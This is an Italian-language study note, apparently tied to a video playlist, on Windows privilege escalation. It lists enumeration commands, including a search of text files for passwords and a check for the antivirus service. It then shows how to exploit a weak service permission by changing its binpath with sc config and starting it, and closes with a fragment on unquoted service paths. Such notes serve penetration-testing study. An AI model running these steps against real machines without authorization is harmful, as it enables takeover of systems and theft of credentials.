
Il mio manuale sui concetti di escalation dei privilegi in Windows. Dai un'occhiata alla mia playlist, link: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk
Un punto importante da notare sono i gruppi: qualsiasi utente del gruppo Administrator ci aiuta a fare escalation!
whoami /priv - privilegi dell'utente correntenet users - elenca tutti gli utentinet user <username> - elenca i dettagli di un utente specificoqwinsta - altri utenti connessi contemporaneamentenet localgroup - gruppi disponibili nel sistemanet localgroup <group-name> - elenca i membri di un gruppo specificosysteminfo - fornisce tutte le informazioni sul sistema operativohostname - nome host del sistemafindstr /si password *.txt - cerchiamo i file che contengono 'password' e per di più nei file di testowmic qfe get Caption,Description,HotFixID,InstalledOn - fornisce informazioni sulle patch di sicurezza e relative informazioninetstat -ano - connessioni associate alla macchinaschtasks /query /fo LIST /v - per cercare eventuali attività pianificatedriverquery - elenca le informazioni relative ai driversc query windefend - cerca il servizio antivirussysteminfo sulla tua macchina: questo è l'unico requisito per questo strumentowmic product get name,version,vendor - fornisce nome, versione e vendor del prodotto. Questo comando in particolare dà una visualizzazione chiara di ciò che ci serve.wmic service list brief | findstr "Running" e per ottenere maggiori informazioni sul servizio usa sc qc <ServiceName>post/multi/recon/local_exploit_suggester; assicurati che la tua sessione sia in background così che questo strumento funzioni correttamente, oppure puoi semplicemente caricarlo da meterpreter.winpeas.exe --helpsysteminfo, copiale in un file e dagli un'estensione .txtQui cercheremo di identificare i servizi con permessi non sicuri e poi proveremo a sfruttarli.
Qui possiamo usare il comando winpeas.exe servicesinfo e vedere i servizi che sono piuttosto utili
Una parte interessante dell'output è questa,```
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: ChangeConfig
- Ma per ottenere maggiori informazioni possiamo usare uno strumento chiamato **accesschk** di Microsoft, eseguirlo come segue `accesschk.exe /accepteula -uwcqv <current-user> <service>`, l'output è,```
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
service_change_config, dove possiamo modificare la configurazione del servizio.sc qc <service> e poi prendi nota del Binary_path_name (può anche essere chiamato binpath), che andremo a modificare (sorriso malvagio)sc config <service> <option>="<value>"sc config daclsvc binpath="<path>" e poi avvia il servizio sc start daclsvcVulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe
The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.